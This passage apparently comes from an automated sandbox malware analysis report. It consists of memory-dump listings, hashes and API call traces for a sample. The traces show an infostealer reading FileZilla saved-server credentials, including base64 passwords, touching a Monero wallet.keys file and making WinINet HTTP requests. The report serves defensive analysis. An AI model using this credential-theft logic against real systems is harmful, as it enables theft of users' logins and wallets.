                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction ID: bcc86ee870aafc14430e5d9daaf402aa3b63216dfa39969a91127d06eb80029b
                                  • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction Fuzzy Hash: 8BA17F72E083119BD308CF25C89075BF7E2EFC8710F1ACA3DA89997254D774E9419B82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3a1698782d04b7c2eac737f93ef633041600aaa49c0d0153fe8eaae1cffc149
                                  • Instruction ID: 8b1f9ac11fb664a5dcb1eec4e7ce725a66bfa04d2883a9b6cd85f3d729ec98c2
                                  • Opcode Fuzzy Hash: d3a1698782d04b7c2eac737f93ef633041600aaa49c0d0153fe8eaae1cffc149
                                  • Instruction Fuzzy Hash: DB51D7B36082049FE3146E29DC4572BBBD6EFD0320F26853CEAC8C7788E93D58468756
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6503c6a06205280df1faa5d524568d8dd505606dd6256d21bca743475b33fbcd
                                  • Instruction ID: 85459b77088704da54d753ee98ba39b234609ac8093ffc353d45b19204d9d33e
                                  • Opcode Fuzzy Hash: 6503c6a06205280df1faa5d524568d8dd505606dd6256d21bca743475b33fbcd
                                  • Instruction Fuzzy Hash: F0514CB394C3149BE3006E2AED8476EF7E5EFC4364F16C63DE6C483744D53558058686
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e4249c939e2011bf8b7bd6819da4a990df327e71029e3d899a4f8e9817020f6
                                  • Instruction ID: da6710e8a90274b45f7c70e485e0238d2b2e03614fd76643cfdb22ca0d926c65
                                  • Opcode Fuzzy Hash: 9e4249c939e2011bf8b7bd6819da4a990df327e71029e3d899a4f8e9817020f6
                                  • Instruction Fuzzy Hash: F3412BF3D082189BE3146E29EC8436AB7D5AB98320F5B853DDAD897744D8391C058686
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction ID: cf656d4d8692a8234e9002433ac90fae4e5007cb96553996822d99f6ad105555
                                  • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction Fuzzy Hash: D0511962E09BD985CB058B7544502EEBFB25FE6210F1E829EC49C1B382C3799689D3E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 203fdfba8624976aa1052da8e2df1778bbfc242949ba4745d7b081616696dd07
                                  • Instruction ID: 4ea19263bf50a0c6e209e7613676922360811fc9dbd06bdf37b13d291446c94c
                                  • Opcode Fuzzy Hash: 203fdfba8624976aa1052da8e2df1778bbfc242949ba4745d7b081616696dd07
                                  • Instruction Fuzzy Hash: 253157F3B046105BE3001E3EED987ABBBDAEBD4720F5B463ED985C3B40D43598058692
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                  • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 00718F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00718F9B
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 0070A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                    • Part of subcall function 0070A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                    • Part of subcall function 0070A110: LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                    • Part of subcall function 0070A110: ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                    • Part of subcall function 0070A110: LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                    • Part of subcall function 0070A110: CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                    • Part of subcall function 00718FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00718FE2
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00720DBF,00720DBE,00720DBB,00720DBA), ref: 007104C2
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007104C9
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 007104E5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 007104F3
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0071052F
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 0071053D
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00710579
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 00710587
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007105C3
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 007105D5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 00710662
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 0071067A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 00710692
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 007106AA
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 007106C2
                                  • lstrcat.KERNEL32(?,profile: null), ref: 007106D1
                                  • lstrcat.KERNEL32(?,url: ), ref: 007106E0
                                  • lstrcat.KERNEL32(?,00000000), ref: 007106F3
                                  • lstrcat.KERNEL32(?,00721770), ref: 00710702
                                  • lstrcat.KERNEL32(?,00000000), ref: 00710715
                                  • lstrcat.KERNEL32(?,00721774), ref: 00710724
                                  • lstrcat.KERNEL32(?,login: ), ref: 00710733
                                  • lstrcat.KERNEL32(?,00000000), ref: 00710746
                                  • lstrcat.KERNEL32(?,00721780), ref: 00710755
                                  • lstrcat.KERNEL32(?,password: ), ref: 00710764
                                  • lstrcat.KERNEL32(?,00000000), ref: 00710777
                                  • lstrcat.KERNEL32(?,00721790), ref: 00710786
                                  • lstrcat.KERNEL32(?,00721794), ref: 00710795
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00720DB7), ref: 007107EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 00c1fd1e0cc010986a27584b645c2fbfd77bd29c8a247b712be34a607aba7d67
                                  • Instruction ID: a172a3c444d2a837d8603d7d2e04b1dd0db8133b5a0e77ca9e732b2906b1c5fa
                                  • Opcode Fuzzy Hash: 00c1fd1e0cc010986a27584b645c2fbfd77bd29c8a247b712be34a607aba7d67
                                  • Instruction Fuzzy Hash: BFD182B5A55208FBCB04EBF8DD5AEEEB339AF54310F408555F102760D1EE38AA84CB61
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 00704800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00704889
                                    • Part of subcall function 00704800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00704899
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00705A48
                                  • StrCmpCA.SHLWAPI(?,011DE920), ref: 00705A63
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00705BE3
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,011DE9B0,00000000,?,011DA7D8,00000000,?,00721B4C), ref: 00705EC1
                                  • lstrlen.KERNEL32(00000000), ref: 00705ED2
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00705EE3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00705EEA
                                  • lstrlen.KERNEL32(00000000), ref: 00705EFF
                                  • lstrlen.KERNEL32(00000000), ref: 00705F28
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00705F41
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00705F6B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00705F7F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00705F9C
                                  • InternetCloseHandle.WININET(00000000), ref: 00706000
                                  • InternetCloseHandle.WININET(00000000), ref: 0070600D
                                  • HttpOpenRequestA.WININET(00000000,011DE8C0,?,011DE3B0,00000000,00000000,00400100,00000000), ref: 00705C48
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00706017
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
